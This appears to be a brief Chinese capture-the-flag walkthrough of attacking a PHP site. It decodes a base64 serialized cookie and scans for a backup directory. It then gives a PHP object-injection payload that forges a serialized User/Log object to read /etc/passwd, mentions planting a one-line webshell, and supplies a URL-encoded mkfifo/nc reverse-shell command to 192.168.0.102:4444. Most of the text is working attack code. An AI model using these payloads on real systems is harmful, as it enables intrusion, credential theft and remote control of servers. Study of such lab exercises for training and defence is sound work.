F12查看,是一串base64编码。
发现cookie是base64加密过的,解密后发现是经过序列化过的
用御剑扫描得到backup路径
审计代码
得到三个php文件他们放一起
经过代码审计可构造payload,尝试读取passwd文件
<?php
class Log {
private $type_log = "/etc/passwd";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
echo base64_encode(serialize($obj));
获得shell
设置一个一句话木马
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f
得到密码